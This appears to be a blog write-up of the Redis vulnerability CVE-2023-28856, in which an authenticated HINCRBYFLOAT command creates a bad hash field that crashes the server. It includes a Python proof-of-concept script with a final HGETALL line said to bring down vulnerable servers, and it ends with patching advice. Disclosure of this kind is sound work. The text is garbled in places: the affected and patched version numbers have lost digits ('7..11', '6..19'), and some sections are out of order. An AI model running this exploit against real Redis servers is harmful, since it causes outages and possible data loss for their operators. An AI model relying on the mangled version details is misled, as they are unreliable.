Redis is a super popular open-source, in-memory data store, trusted by thousands of companies and projects for its speed and persistence. But even great tools have their flaws. In this deep dive, we focus on CVE-2023-28856, a security bug that lets authenticated users crash Redis servers with a single command—no advanced hacking needed.

If you use Redis for caching, messaging, or as a primary database, read on. We’ll break down what happened, show a working exploit example, and tell you how to fix it.

CVE-2023-28856 is a high-risk vulnerability affecting certain versions of Redis. Specifically

- An *authenticated user* can craft a special command using HINCRBYFLOAT that causes Redis to create a "bad" or invalid hash field.

When any client later tries to access this hash field, Redis crashes.

No shell access is needed: just valid credentials to a vulnerable Redis instance.  
Impact: Denial of Service (Redis goes down, disruption of all services depending on it).

7. series: before 7..11

> Patched Versions:  
> - 6..19  
> - 6.2.12  
> - 7..11

How Does the Exploit Work?

The core Redis data type at risk here is Hashes (like tiny key-value stores inside Redis). The HINCRBYFLOAT command is used to increment a hash field by a floating point value.

Due to poor input validation in the vulnerable versions, HINCRBYFLOAT can store a *non-numeric* or otherwise “broken” value in a hash field. Later, when Redis tries to read or process this value—even just listing the hash’s fields—it crashes.

Example Exploit

Let’s look at a simple Python exploit using redis-py. You need valid Redis credentials to make this work.

import redis

# Connect to Redis (edit host, port, password as needed)
r = redis.StrictRedis(host='localhost', port=6379, password='yourpassword')

# Create a hash with a valid field
r.hset('test-hash', 'good_field', 1)

# Trigger the bug by incrementing a field with NaN (simulate it as string payload)
# This will create an invalid value in 'bad_field'
try:
    r.execute_command('HINCRBYFLOAT', 'test-hash', 'bad_field', 'nan')
except redis.ResponseError as e:
    print("[*] Error (as expected in patched Redis):", e)
else:
    print("[*] Exploit sent. Hash now contains an invalid field.")

# Now, just reading the hash (e.g., using HGETALL) may crash the server in vulnerable versions
# r.hgetall('test-hash')

NOTE: Executing the last line (r.hgetall('test-hash')) may bring down vulnerable Redis servers.

Real-World Impact

- Downed Databases: This leads to hard downtime and possible data loss if Redis isn’t set up for high availability.
- Easy Weapon: Any authenticated user (or attacker who steals a Redis password) gets a one-shot crash tool.

Restart Redis after update

> There are no public workarounds. Disabling the command is not supported.  
> Block all untrusted clients from accessing Redis until patched.

Resources & References

- Official Redis Security Advisory
- Redis CVE-2023-28856 Issue Tracker
- NVD Entry for CVE-2023-28856

Only fix: Upgrade to the patched Redis versions.

- All users: Patch as soon as possible—and always keep your Redis servers off the public internet!

Redis is fast, but security moves fast too. Stay one step ahead by keeping up to date.

Timeline

Published on: 04/18/2023 21:15:00 UTC
Last modified on: 06/01/2023 14:15:00 UTC